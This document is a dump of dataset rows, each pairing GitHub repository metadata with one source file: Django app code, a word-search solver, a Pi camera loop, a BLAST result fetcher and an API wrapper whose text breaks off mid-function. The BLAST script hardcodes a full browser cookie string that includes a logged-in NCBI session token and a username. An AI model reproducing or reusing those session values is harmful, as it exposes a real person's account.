| Column | Type | Length / range / classes |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3-281 |
| content_id | string | length 40 |
| detected_licenses | list | 0-57 items |
| license_type | string | 2 classes |
| repo_name | string | length 6-116 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 313 classes |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 18.2k-668M, nullable |
| star_events_count | int64 | 0-102k |
| fork_events_count | int64 | 0-38.2k |
| gha_license_id | string | 17 classes |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 107 classes |
| src_encoding | string | 20 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 4-6.02M |
| extension | string | 78 classes |
| content | string | length 2-6.02M |
| authors | list | 1 item |
| author | string | length 0-175 |
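The schema above can be queried directly once the rows are materialized; a minimal sketch, assuming the dump has been exported to a Parquet file (the file name rows.parquet is an assumption, not part of this dump):

import pandas as pd

# Hypothetical export of the rows below; this dump does not ship one.
df = pd.read_parquet("rows.parquet")

# Keep permissively licensed, human-written Python files under 10 kB.
subset = df[
    (df["license_type"] == "permissive")
    & ~df["is_vendor"]
    & ~df["is_generated"]
    & (df["length_bytes"] < 10_000)
]
print(subset[["repo_name", "path", "star_events_count"]].head())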
a4988105b8f44db42f20393940d9d3a3ae4e6178
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/125_algorithms/_exercises/templates/_algorithms_challenges/pybites/intermediate/191/bmi.py
|
0ee130d805eb92fd958498062113b022207001d6
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 |
Python
|
UTF-8
|
Python
| false | false | 1,056 |
py
|
# data """Luke Skywalker,172,77
# C-3PO,167,75
# R2-D2,96,32
# Darth Vader,202,136
# Leia Organa,150,49
# Owen Lars,178,120
# Beru Whitesun lars,165,75
# R5-D4,97,32
# Biggs Darklighter,183,84
# Obi-Wan Kenobi,182,77
# Anakin Skywalker,188,84
# Chewbacca,228,112
# Han Solo,180,80
# Greedo,173,74
# Jek Tono Porkins,180,110
# Yoda,66,17
# Palpatine,170,75
# Boba Fett,183,78.2
# IG-88,200,140
# Bossk,190,113
# """
#
#
# ___ person_max_bmi data_?
# """Return (name, BMI float) of the character in data that
# has the highest BMI (rounded on 2 decimals)"""
# bmi # dict
# data_list ?.s.. "\n"
#
# ___ row __ ?
# current ?.s...s.. ","
# __ l.. ? > 1
# ? ? 0 f__ c.. 2 / i.. ? 1 / 100) ** 2
#
# name_max_bmi m.. b.. key b__.g..
# r.. ? r.. b.. ? 2
#
# # if __name__ == "__main__":
# # print(person_max_bmi())
|
[
"[email protected]"
] | |
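A quick hand check of person_max_bmi above (BMI = weight_kg / height_m ** 2, values taken from the data block):

# Yoda (66 cm, 17 kg) tops the table, ahead of e.g. IG-88 (200 cm, 140 kg).
yoda = 17 / (66 / 100) ** 2    # 39.026...
ig88 = 140 / (200 / 100) ** 2  # 35.0
assert round(yoda, 2) == 39.03 and yoda > ig88
# so person_max_bmi() should return ('Yoda', 39.03)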
1082ace705179dde53219daae2a8d6cf3f9c2bba
|
bf25e2478d11132ea4db03c4b8e12180dd72b39a
|
/reviewweb/urls.py
|
6b528d4606635fb1e55ffc279c25006000fdc78c
|
[] |
no_license
|
hassanito/reviewweb
|
0892d6d444e93e88daabaa2289b7a1c8a8e69deb
|
3233299f0570f60ef0a1d321e56d19104900ceac
|
refs/heads/master
| 2020-06-25T13:54:27.716798 | 2019-09-09T21:09:13 | 2019-09-09T21:09:13 | 199,328,513 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,689 |
py
|
"""reviewweb URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from . import views

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', views.HomePage.as_view(), name="home"),
    path("test/", views.TestPage.as_view(), name="test"),
    path('thanks', views.ThanksPage.as_view(), name="thanks"),
    path('accounts/', include('accounts.urls', namespace='accounts')),
    path('accounts/', include('django.contrib.auth.urls')),
    path('shops/', include('shops.urls', namespace='shops')),
    path('ajax_calls/search/', views.autocompleteModel),
    path('login/', views.ajax_login),
    path('oauth/', include('social_django.urls', namespace='social')),  # <--
    path('comment/', views.comment, name='comment'),
    path('review/', views.review_ajax, name='review_ajax'),
]

from django.conf import settings
from django.conf.urls.static import static
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"1Aa_12345"
] |
1Aa_12345
|
600d648aef968fa6d9aaf3ddd8d410059382df4b
|
65f856bb3c782fe2fec794192260d5b7aa997ef3
|
/wsc_django/wsc_django/apps/shop/services.py
|
0a53f3c8e183bdcaeeefad41252f7a5440069671
|
[
"MIT"
] |
permissive
|
hzh595395786/wsc_django
|
0c8faf0cac1d8db8d9e3fa22f6914b6b64bf788b
|
c0a4de1a4479fe83f36108c1fdd4d68d18348b8d
|
refs/heads/main
| 2023-06-06T07:26:17.979944 | 2021-06-24T13:14:53 | 2021-06-24T13:14:53 | 336,303,377 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,909 |
py
|
from uuid import uuid4
from django.db.models import Count
from product.constant import ProductStatus
from shop.models import Shop, HistoryRealName, ShopRejectReason, PayChannel
from shop.utils import get_shop_mini_program_qcode, put_qcode_file_to_tencent_cos
from user.models import User
from shop.constant import (
ShopStatus,
)
def create_shop(shop_info: dict, user: User):
"""
Create a shop
:param shop_info:{
"shop_name": "name",
"shop_img": "http://xxx",
"shop_province": 420000,
"shop_city": 420100,
"shop_county": 420101,
"shop_address": "光谷智慧谷一栋505",
"description": "xxxx",
"suggest_phone": "153xxxxxxxx",
"shop_phone": "152xxxxxxxx",
"super_admin_id": 1
}
:param user: the user object that creates the shop
:return:
"""
# Create the shop
# Pick a random shop code; check it, and pick another if it already exists
while True:
shop_code = str(uuid4())[-9:]
shop = Shop.objects.filter(shop_code=shop_code)
if not shop:
break
shop_info["shop_code"] = shop_code
shop_info["shop_phone"] = user.phone
shop_info["super_admin_id"] = user.id
shop = Shop(**shop_info)
shop.save()
return shop
def create_pay_channel(pay_channel_info: dict, shop_id: int):
"""
Create a pay_channel for a shop
:param pay_channel_info:
:param shop_id:
:return:
"""
shop_pay_channel = PayChannel(shop_id=shop_id, **pay_channel_info)
shop_pay_channel.save()
return shop_pay_channel
def create_shop_reject_reason_by_shop_id(shop_id: int, reject_reason: str):
"""
Create a rejection reason for a rejected shop
:param shop_id:
:return:
"""
reject_reason = ShopRejectReason(id=shop_id, reject_reason=reject_reason)
reject_reason.save()
return reject_reason
def create_shop_creator_history_realname(shop_id: int, history_realname: str):
"""
Store the shop creator's historical real name, bound to the shop
:param shop_id:
:param history_realname:
:return:
"""
history_realname = HistoryRealName(id=shop_id, realname=history_realname)
history_realname.save()
return history_realname
def create_shop_mini_program_qcode(shop_code: str):
"""
Create a mini-program QR code for a shop
:param shop_code:
:return:
"""
qcode_file = get_shop_mini_program_qcode(shop_code)
success, url = put_qcode_file_to_tencent_cos(qcode_file, shop_code)
return success, url
def update_shop_data(shop: Shop, args: dict):
"""
Update shop information
:param shop:
:param args:
:return:
"""
for k, v in args.items():
setattr(shop, k, v)
shop.save()
return shop
def get_shop_by_shop_code(shop_code: str, only_normal: bool = True):
"""
Get a Shop object by shop_code
:param shop_code: shop code
:param only_normal: only query shops in normal status
:return:
"""
shop = Shop.objects.filter(shop_code=shop_code)
if shop and only_normal:
shop = shop.filter(status=ShopStatus.NORMAL)
shop = shop.first()
return shop
def get_shop_by_shop_id(shop_id: int, filter_close: bool = True):
"""
Get a shop by shop id
:param shop_id: shop id
:param filter_close: exclude closed shops
:return:
"""
shop = Shop.objects.filter(id=shop_id)
if shop and filter_close:
shop = shop.exclude(status=ShopStatus.CLOSED)
shop = shop.first()
return shop
def list_shop_by_shop_ids(shop_ids: list, filter_close: bool = True, role: int = 1):
"""
List shops by a list of shop ids
:param shop_ids:
:param filter_close: exclude closed shops
:param role: access role: 1 for ordinary users, 2 for admin users; ordinary users can only see approved shops
:return:
"""
shop_list_query = Shop.objects.filter(id__in=shop_ids)
if shop_list_query and filter_close:
shop_list_query = shop_list_query.exclude(status=ShopStatus.CLOSED)
if role == 1:
shop_list_query = shop_list_query.filter(status=ShopStatus.NORMAL)
shop_list = shop_list_query.all()
return shop_list
def list_shop_by_shop_status(shop_status: int):
"""
List all shops in a given status
:param shop_status:
:return:
"""
shop_list = Shop.objects.filter(status=shop_status).order_by('update_at').all()
return shop_list
def list_shop_creator_history_realname(shop_ids: list):
"""
List the historical real names of shop creators
:param shop_ids:
:return:
"""
history_realname_list = (
HistoryRealName.objects.filter(id__in=shop_ids).all()
)
return history_realname_list
def list_shop_reject_reason(shop_ids: list):
"""查询出所有的商铺拒绝信息"""
reject_reason_list = ShopRejectReason.objects.filter(id__in=shop_ids).all()
return reject_reason_list
|
[
"[email protected]"
] | |
84be4e8d39c28cb877ef19a7d621b0647ea40be7
|
b3ee3f3f1c5493770919bdfd39680d87be848b9b
|
/Week5/exist.py
|
2ba9d3ce55a12872028e78a8e46a3367f827ab60
|
[] |
no_license
|
shubhrarajadhyaksha/Wallbreakers
|
ae3ef97454636ce068330fe10be9fef7ed58f099
|
e6f8f6045c1a4f60c6e719e88abacfb71d23e995
|
refs/heads/master
| 2020-06-08T03:14:03.160010 | 2019-09-02T20:21:33 | 2019-09-02T20:21:33 | 193,148,679 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 999 |
py
|
from typing import List


class Solution:
    def exist(self, board: List[List[str]], word: str) -> bool:
        rows = len(board)
        cols = len(board[0])
        l = len(word)

        def dfs(board, r, c, i):
            if i == l:
                return True
            if r < 0 or r >= rows:
                return False
            if c < 0 or c >= cols:
                return False
            char = board[r][c]
            if char == word[i]:
                board[r][c] = "."  # mark the cell as visited
                if dfs(board, r+1, c, i+1) or dfs(board, r-1, c, i+1) or dfs(board, r, c+1, i+1) or dfs(board, r, c-1, i+1):
                    return True
                board[r][c] = char  # restore the cell on backtrack
            return False

        for r in range(rows):
            for c in range(cols):
                if dfs(board, r, c, 0):
                    return True
        return False
|
[
"[email protected]"
] | |
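A usage sketch for the exist() word search above, assuming the Solution class from /Week5/exist.py is in scope (the board and words are the classic example inputs, not from the original repo); the DFS marks a visited cell with "." and restores it on backtrack, so a cell cannot be reused within one path:

from typing import List

board: List[List[str]] = [
    ["A", "B", "C", "E"],
    ["S", "F", "C", "S"],
    ["A", "D", "E", "E"],
]
solver = Solution()  # Solution as defined in the file above
print(solver.exist(board, "ABCCED"))  # True: A->B->C->C->E->D is a connected path
print(solver.exist(board, "ABCB"))    # False: the 'B' cell cannot be reused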
f73d1fe32098c5bf77b55cbe7ca232ff32b2a49a
|
1475fd4bf28de5647860e0d106af2b459e114ae9
|
/app/data.py
|
4f4330cf2270a5595071bd0221f3949856fc9bf6
|
[
"MIT"
] |
permissive
|
snspam/sn_spam
|
66232942685d37dbbbb861d331ec52120034153a
|
e0bb8e9c843e26e5f4be8a49a960ebf7a0d5bfd5
|
refs/heads/master
| 2020-03-19T09:16:46.460571 | 2018-06-07T23:20:02 | 2018-06-07T23:20:02 | 136,274,192 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,386 |
py
|
import pandas as pd
class Data:
data_dir = 'independent/data/'
# public
def __init__(self, generator_obj, util_obj):
self.gen_obj = generator_obj
self.util_obj = util_obj
def get_rel_ids(self, dfs, domain='twitter', relations=[], sim_dir=None,
exact=True):
sim_path = '%s%s/%s/' % (Data.data_dir, domain, sim_dir)
dd = None if sim_dir is None else sim_path
new_dfs = {}
for dset in ['train', 'val', 'test']:
df = dfs[dset]
if df is not None:
df = self.gen_obj.gen_relational_ids(df, relations,
data_dir=dd, exact=exact,
dset=dset)
new_dfs[dset] = df
return new_dfs
def get_data(self, start=0, end=1000, domain='twitter', evaluation='cc'):
t1 = self.util_obj.out('reading in data...')
skiprows = range(1, start)
nrows = end - start
result = None
if evaluation == 'tt':
train_path = Data.data_dir + domain + '/train.csv'
test_path = Data.data_dir + domain + '/test.csv'
train_df = pd.read_csv(train_path, lineterminator='\n',
skiprows=skiprows, nrows=nrows)
train_df = train_df.reset_index().drop(['index'], axis=1)
test_df = pd.read_csv(test_path, lineterminator='\n')
result = (train_df, test_df)
elif evaluation == 'cc':
path = Data.data_dir + domain + '/comments.csv'
coms_df = pd.read_csv(path, lineterminator='\n',
skiprows=skiprows, nrows=nrows)
coms_df = coms_df.reset_index().drop(['index'], axis=1)
result = coms_df
self.util_obj.time(t1)
return result
def sep_data(self, df, relations=[], domain='twitter', data='both'):
if data == 'both':
return df
ids = set()
list_filter = lambda x: True if x != [] else False
for relation, group, group_id in relations:
q_df = df[df[group_id].apply(list_filter)]
ids.update(set(q_df['com_id']))
ind_df = df[~df['com_id'].isin(ids)]
rel_df = df[df['com_id'].isin(ids)]
result_df = ind_df if data == 'ind' else rel_df
return result_df
def split_data(self, df, train_size=0.7, val_size=0.15, val_split=0.0):
num_coms = len(df)
if train_size == 0 and val_size == 0: # used for tt eval
data = {'train': df, 'val': None, 'test': None}
elif val_size == 0: # no relational training data
split_ndx = int(num_coms * train_size)
train_df = df[:split_ndx]
test_df = df[split_ndx:]
data = {'train': train_df, 'val': None, 'test': test_df}
else:
split_ndx1 = int(num_coms * train_size)
split_ndx2 = split_ndx1 + int(num_coms * val_size)
train_df = df[:split_ndx1]
val_df = df[split_ndx1:split_ndx2]
test_df = df[split_ndx2:]
if val_split > 0.0:
val_split_ndx = int(len(val_df) * (1 - val_split))
val_df = val_df[val_split_ndx:]
data = {'train': train_df, 'val': val_df, 'test': test_df}
return data
|
[
"[email protected]"
] | |
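To make the arithmetic in split_data above concrete: with 100 rows and the defaults train_size=0.7 and val_size=0.15, the split indices are 70 and 85, giving 70/15/15 train/val/test rows. A minimal sketch, assuming the Data class above is importable (its constructor arguments are not used by split_data):

import pandas as pd

df = pd.DataFrame({"com_id": range(100)})
data = Data(generator_obj=None, util_obj=None)  # Data as defined above
splits = data.split_data(df)
print(len(splits["train"]), len(splits["val"]), len(splits["test"]))  # 70 15 15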
a69fba4e5d07f0b75304b6ba75e87e6f68467fdc
|
1e449c2b408c59f7722aeeacf01ac6d904016785
|
/boardapp/models.py
|
488018ad7e9ed9e552116797d04d734d4ff54611
|
[] |
no_license
|
alittlekitten/hangoverlion
|
62930111298000ceb99aa282bbbdbc596150f5c5
|
3643adfac2fb5c420a00e9548ef5c43a629f0c78
|
refs/heads/master
| 2023-04-29T00:29:59.874724 | 2019-06-01T10:17:53 | 2019-06-01T10:17:53 | 189,718,352 | 0 | 0 | null | 2023-04-21T20:33:41 | 2019-06-01T10:13:16 |
JavaScript
|
UTF-8
|
Python
| false | false | 600 |
py
|
from django.db import models

# Create your models here.
class Board(models.Model):
    title = models.CharField(max_length=200)
    name = models.CharField(max_length=50)
    pub_date = models.DateTimeField('date published')
    body = models.TextField()

    def __str__(self):
        return self.title

class Comment(models.Model):
    board = models.ForeignKey('Board', on_delete=models.CASCADE, related_name='comments')
    comment_author = models.CharField(max_length=10)
    comment_contents = models.TextField(max_length=200)
    created_date = models.DateTimeField(auto_now_add=True)
|
[
"alittlekitten"
] |
alittlekitten
|
bcc75b28b810ed3342694c31eda9379e6b0b1569
|
0af56ece1f50f93cd4e4841ba101600f958fe94c
|
/camera.py
|
0887896256ffbf12bfd73d540af4f556ee8777e2
|
[] |
no_license
|
strikerdlm/HAB-pi-cam
|
df21f8f483b0c8b5e0ca9ffb53cdec7af9f5ca91
|
b1eb0f4c87501adcae7cb5ec28f8ad96ddaa0e4d
|
refs/heads/master
| 2021-09-07T07:21:05.872448 | 2018-02-19T14:17:41 | 2018-02-19T14:17:41 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,917 |
py
|
#!/usr/bin/python2
# Import required modules
import picamera
import time
import signal
import sys
import os

# The following code will write the Process ID of this script to a hidden file
pid = os.getpid()
PIDfilename = ".PID"
PIDfile = open(PIDfilename, "wt")
PIDfile.write(str(pid))
PIDfile.close()

# Variables
numpics = 5    # number of still pictures taken
numburst = 5   # number of burst pictures taken
rectime = 300  # length of time to record in each loop between pictures (in seconds)

# Functions
# This function will take a number of still pictures, as defined by the input parameter
def capture(numPics):
    for i in range(0, numPics):
        picname = str(time.strftime('%I%M%S%p_%d-%m-%y'))
        camera.capture('Pictures/' + picname + '.jpg')
        time.sleep(1)

# This function will take a burst of pictures
def burst(numBurst):
    camera.capture_sequence(['Pictures/' + str(time.strftime('%I%M%S%p_%d-%m-%y')) + '_burst' + str(i+1) + '.jpg' for i in range(numBurst)])

def record(recTime):
    vidname = str(time.strftime('%I%M%S%p_%d-%m-%y'))
    camera.start_recording('Videos/' + vidname + '.h264')
    time.sleep(recTime)
    camera.stop_recording()
    time.sleep(1)

# The following function handles the case when a kill signal is sent to the process
def signal_term_handler(signal, frame):
    camera.close()
    os.remove(PIDfilename)  # removes the hidden temp PID file
    sys.exit()

signal.signal(signal.SIGTERM, signal_term_handler)

try:
    with picamera.PiCamera() as camera:
        while True:
            camera.start_preview(alpha=0)  # starting the preview "warms up" the camera, and is recommended in the PiCamera documentation
            time.sleep(2)
            capture(numpics)
            burst(numburst)
            record(rectime)
            camera.stop_preview()
            time.sleep(2)
# Handles the case when user exits the running script using Control+C
except KeyboardInterrupt:
    camera.close()
    os.remove(PIDfilename)  # removes the hidden temp PID file
    sys.exit()
|
[
"[email protected]"
] | |
b176a24c12a2f81960d594b227e0eb66dc7ca889
|
c192132c7c2b815d480b243b591c2c9dac8d969b
|
/result.py
|
f369eb20ad333d584dbf29c1573ee366b42523f5
|
[] |
no_license
|
Annihilater/blast.ncbi.nlm.nih.gov
|
b967dd3abf1ca1b075566262ee11906d7f5170ce
|
e62dabb4f9fc7c0e359051e3cdbc97c45f1fbdee
|
refs/heads/master
| 2020-08-24T14:32:54.451809 | 2019-10-23T09:41:37 | 2019-10-23T09:41:37 | 216,845,290 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,854 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2019/10/23 11:16
# @Author: yanmiexingkong
# @email : [email protected]
# @File : result.py
import requests
def get_result(rid):
"""
Fetch the result by rid
:param rid:
:return:
"""
url = "https://blast.ncbi.nlm.nih.gov/Blast.cgi"
headers = {
'authority': "blast.ncbi.nlm.nih.gov",
'pragma': "no-cache",
'cache-control': "no-cache,no-cache",
'upgrade-insecure-requests': "1",
'user-agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36",
'sec-fetch-mode': "navigate",
'sec-fetch-user': "?1",
'origin': "https://blast.ncbi.nlm.nih.gov",
'content-type': "application/x-www-form-urlencoded",
'accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",
'sec-fetch-site': "same-origin",
'referer': "https://blast.ncbi.nlm.nih.gov/Blast.cgi",
'accept-encoding': "gzip, deflate, br",
'accept-language': "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6",
'cookie': "MyBlastUser=1-K62_H2PRYnAJWAW8C499055; ncbi_sid=5AAB49C2DAD5CBD1_0000SID; _ga=GA1.2.1760716258.1571642619; _gid=GA1.2.1120047674.1571642619; _ga=GA1.3.1760716258.1571642619; _gid=GA1.3.1120047674.1571642619; QSI_HistorySession=https%3A%2F%2Fwww.nlm.nih.gov%2F%23~1571655071695; ___rl__test__cookies=1571655469341; OUTFOX_SEARCH_USER_ID_NCOO=1690574555.305844; books.article.report=; MyNcbiSigninPreferences=O25jYmlscyY%3D; ncbi_prevPHID=CE8CB87BDAD9B9910000000000110007.m_8.09; WebCubbyUser=YFK36EUALZSLFML717L8VTJ8L7VZ587M%3Blogged-in%3Dtrue%3Bmy-name%3Dyanmiexingkong%3Bpersistent%3Dfalse%405AAB49C2DAD5CBD1_0000SID; BlastCubbyImported=active; ncbi_pinger=N4IgDgTgpgbg+mAFgSwCYgFwgKwEFcBCALAJwDCATACK5XZkFUkCM2A7Mx6UcwGzbYAygEkqIADQgArgDsANgHsAhqhlQAHgBdMoCphAAjOUoDO2yQGZ9MiBJBFrUAO5HTm6CalzNJu9n12nPoAZkpyJlB2FAAM+tjRZCQWFKw0AKK8ABy4LNF5+QWFzFHFWK5mGDaVzuXuUJ7eJhgAcgDyzWlRemXGZgB0MgDGBsgDcgC2A8iIfQDmCjBRJPrMJDF2FrFYzDGxlqUgq+uW3YecbBtWWKHhkZYOWO5SdyAWmQGWy1i8JD8kbFZJEQtiAfmxeGwKBcgVcQNE+hReH1ikCHtJ5MpVBpzPZ/Ns/LDMmwHJJsGjmNFeLw/NTttgKHpSRcsHtQQcAQ4AL6coA,MyBlastUser=1-K62_H2PRYnAJWAW8C499055; ncbi_sid=5AAB49C2DAD5CBD1_0000SID; _ga=GA1.2.1760716258.1571642619; _gid=GA1.2.1120047674.1571642619; _ga=GA1.3.1760716258.1571642619; _gid=GA1.3.1120047674.1571642619; QSI_HistorySession=https%3A%2F%2Fwww.nlm.nih.gov%2F%23~1571655071695; ___rl__test__cookies=1571655469341; OUTFOX_SEARCH_USER_ID_NCOO=1690574555.305844; books.article.report=; MyNcbiSigninPreferences=O25jYmlscyY%3D; ncbi_prevPHID=CE8CB87BDAD9B9910000000000110007.m_8.09; WebCubbyUser=YFK36EUALZSLFML717L8VTJ8L7VZ587M%3Blogged-in%3Dtrue%3Bmy-name%3Dyanmiexingkong%3Bpersistent%3Dfalse%405AAB49C2DAD5CBD1_0000SID; BlastCubbyImported=active; ncbi_pinger=N4IgDgTgpgbg+mAFgSwCYgFwgKwEFcBCALAJwDCATACK5XZkFUkCM2A7Mx6UcwGzbYAygEkqIADQgArgDsANgHsAhqhlQAHgBdMoCphAAjOUoDO2yQGZ9MiBJBFrUAO5HTm6CalzNJu9n12nPoAZkpyJlB2FAAM+tjRZCQWFKw0AKK8ABy4LNF5+QWFzFHFWK5mGDaVzuXuUJ7eJhgAcgDyzWlRemXGZgB0MgDGBsgDcgC2A8iIfQDmCjBRJPrMJDF2FrFYzDGxlqUgq+uW3YecbBtWWKHhkZYOWO5SdyAWmQGWy1i8JD8kbFZJEQtiAfmxeGwKBcgVcQNE+hReH1ikCHtJ5MpVBpzPZ/Ns/LDMmwHJJsGjmNFeLw/NTttgKHpSRcsHtQQcAQ4AL6coA; ncbi_sid=5AAB49C2DAD5CBD1_0000SID; BlastCubbyImported=passive",
'Postman-Token': "effbbf9e-09ff-4958-8a0e-a8c3d2719ae1,ffe9004f-7563-4ea5-ad02-943a343657a8",
'Host': "blast.ncbi.nlm.nih.gov",
'Content-Length': "1354",
'Connection': "keep-alive"
}
data = {'ADV_VIEW': 'true', 'ALIGNMENTS': '100', 'ALIGNMENT_VIEW': 'Pairwise', 'BLAST_PROGRAMS': 'blastp',
'CDD_RID': 'UWU3DJDS015', 'CDD_SEARCH_STATE': '2', 'CLIENT': 'web', 'COMPOSITION_BASED_STATISTICS': '2',
'CONFIG_DESCR': '2%2C3%2C4%2C5%2C6%2C7%2C8', 'DATABASE': 'nr_v5', 'DB_DISPLAY_NAME': 'nr',
'DESCRIPTIONS': '100', 'EQ_OP': 'AND', 'EXPECT': '10', 'FILTER': 'F', 'FORMAT_NUM_ORG': '1',
'FORMAT_OBJECT': 'Alignment', 'FORMAT_TYPE': 'HTML', 'FULL_DBNAME': 'nr_v5', 'GAPCOSTS': '11%2B1',
'GET_SEQUENCE': 'true', 'HSP_RANGE_MAX': '0', 'JOB_TITLE': '%2B5ubb%2B', 'LAYOUT': 'OneWindow',
'LINE_LENGTH': '60', 'MASK_CHAR': '2', 'MASK_COLOR': '1', 'MATRIX_NAME': 'BLOSUM62', 'MAX_NUM_SEQ': '100',
'NCBI_GI': 'false', 'NEW_VIEW': 'true', 'NUM_DIFFS': '0', 'NUM_OPTS_DIFFS': '0', 'NUM_ORG': '1',
'NUM_OVERVIEW': '100', 'ORG_DBS': 'giless_dbvers5', 'PAGE': 'Proteins', 'PAGE_TYPE': 'BlastSearch',
'PROGRAM': 'blastp',
'QUERYFILE': '%3E5ubb%0D%0ASQVINGEMQFYARAKLFYQEVPATEEGMMGNFIELSSPDIQASQKFLRKFVGGPGRAGTDCALDCGSGIGRVSKHVLLPVFNSVELVDMMESFLLEAQNYLQVKGDESYHCYSLQEFTPPFRRYDVIWIQWVSGHLTDKDLLAFLSRCRDGLKENGIIILKDNVAREGCILDLSDSSVTRDMDILRSLIRKSGLVVLGQEKQDGFPEQCIPVWMFALH%0D%0A',
'QUERY_INFO': '%2B5ubb%2B', 'QUERY_LENGTH': '218', 'REPEATS': '45518', 'RTOE': '27',
'SAVED_SEARCH': 'true', 'SEARCH_DB_STATUS': '31', 'SELECTED_PROG_TYPE': 'blastp', 'SERVICE': 'plain',
'SHORT_QUERY_ADJUST': 'on', 'SHOW_CDS_FEATURE': 'false', 'SHOW_LINKOUT': 'true', 'SHOW_OVERVIEW': 'true',
'UNIQ_DEFAULTS_NAME': 'A_SearchDefaults_1iMhfz_1v71_duIAy0mW1FA_GTXQl_2J8uR3', 'USER_DEFAULT_MATRIX': '4',
'USER_DEFAULT_PROG_TYPE': 'blastp', 'USER_TYPE': '1', 'WORD_SIZE': '6', '_PGR': '6', 'db': 'protein',
'stype': 'protein', 'CMD': 'Get'}
data.update({'RID': rid})
response = requests.post(url=url, data=data, headers=headers)
html = response.text
with open('data/html/result.html', 'w') as f:
f.write(html)
if __name__ == '__main__':
rid = 'UX0VYAFM015'
rid2 = 'UXTZXYRW015'
rid3 = 'V019SAM701R'
get_result(rid3)
|
[
"[email protected]"
] | |
9efe79a16c6f27bddfc4536d573389398935b830
|
3b5d1a53af8d2f4094005f342403eabc7af9c980
|
/moderation_module/storage/logging_data.py
|
5f1eb3107e2c0a2e75844b5cbdd60700cde60414
|
[
"MIT"
] |
permissive
|
alentoghostflame/StupidAlentoBot
|
daa828be3d47b24d3e13d500155a6a0d2019f724
|
c024bfb79a9ecb0d9fda5ddc4e361a0cb878baba
|
refs/heads/master
| 2021-06-30T17:50:14.997416 | 2021-06-08T03:54:24 | 2021-06-08T03:54:24 | 237,541,303 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 387 |
py
|
from alento_bot import guild_data_transformer
import logging
import typing

logger = logging.getLogger("main_bot")

@guild_data_transformer(name="guild_logging_config")
class GuildLoggingConfig:
    def __init__(self):
        self.toggled_on: bool = False
        self.log_channel_id: int = 0
        self.exempt_channels: typing.Set[int] = set()
        self.log_bots: bool = False
|
[
"[email protected]"
] | |
6f927f95ffc8e9ede4b6ba26df040a784d1f5146
|
8f5cb19e9c6a0670100b4a4fbdbb892d94ccd4a8
|
/deployment/georegistry.py
|
5c1e240d6a6b964f6e177dd39a8f7f9b1dc6a607
|
[] |
no_license
|
invisibleroads/georegistry
|
84438e680e56ac716f60d23784f05469c4888841
|
df56cc17b01a794bfbd53f354bb5fa9abeb420cc
|
refs/heads/master
| 2023-08-24T03:34:50.554375 | 2011-05-05T16:36:19 | 2011-05-05T16:36:19 | 966,680 | 1 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,359 |
py
|
'GeoRegistry API Python wrapper'
# Import system modules
import urllib
import urllib2
import simplejson

# Core
baseURL = 'http://georegistry.invisibleroads.com'

def updateFeatures(key, srid, featureCollection, tags, public=False):
    'Update features using the GeoRegistry web service'
    # Initialize
    url = baseURL + '/features'
    # Call
    responseData = call(url, {
        'key': key,
        'srid': srid,
        'featureCollection': featureCollection,
        'tags': '\n'.join(tags),
        'public': 1 if public else 0,
    }, 'POST')
    # Return
    return [int(x) for x in responseData.splitlines()]

def deleteFeatures(key, featureIDs):
    'Delete features using the GeoRegistry web service'
    # Initialize
    url = baseURL + '/features'
    # Call
    call(url, {
        'key': key,
        'featureIDs': '\n'.join(str(x) for x in featureIDs),
    }, 'DELETE')

def getTags(key):
    'Get tags with visible features using the GeoRegistry web service'
    # Initialize
    url = baseURL + '/tags'
    # Call
    responseData = call(url + '.json', {
        'key': key,
    }, 'GET')
    # Return
    return responseData.splitlines()

def viewMaps(key, srid, tags, simplified=True, bboxFormat='yxyx', bbox=None):
    'Assemble a map using the GeoRegistry web service'
    # Initialize
    url = baseURL + '/maps'
    # Call
    responseData = call(url + '.json', {
        'key': key,
        'srid': srid,
        'tags': '\n'.join(tags),
        'bboxFormat': bboxFormat,
        'bbox': bbox if bbox else '',
        'simplified': 1 if simplified else 0,
    }, 'GET')
    # Return
    return responseData

# Helpers
def call(url, valueByName, method):
    'Call a method in the GeoRegistry web service'
    requestData = urllib.urlencode(valueByName.items())
    request = Request(method, url, requestData) if method.upper() == 'POST' else Request(method, url + '?' + requestData)
    try:
        response = urllib2.urlopen(request)
